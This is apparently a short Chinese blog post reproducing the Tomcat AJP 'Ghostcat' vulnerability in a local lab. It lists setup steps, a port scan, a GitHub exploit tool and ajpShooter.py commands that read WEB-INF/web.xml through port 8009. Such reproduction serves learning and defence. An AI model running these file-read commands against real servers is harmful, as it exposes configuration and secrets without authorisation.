服务器容器漏洞-Tomcat AJP协议漏洞分析与利用
参考:https://www.freebuf.com/articles/network/227973.html
https://blog.csdn.net/qq294235493/article/details/104494266
https://www.cnblogs.com/smartmsl/p/12516591.html
复现过程
1、环境准备
apache-tomcat-8.0.53,在windows中解压之后,配置环境变量
访问http://127.0.0.1:8080/
2、
参考https://www.cnblogs.com/smartmsl/p/12516591.html
(1)扫描本地端口,8009开放
(2)下载工具:https://github.com/00theway/Ghostcat-CNVD-2020-10487
(3)测试
python ajpShooter.py http://127.0.0.1:8080/ 8009 /jsp/index.jsp read
3、执行
python ajpShooter.py http://127.0.0.1:8080/ 8009 /WEB-INF/web.xml read
根据读取的内容分析,是webapps\ROOT\WEB-INF\web.xml的内容
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战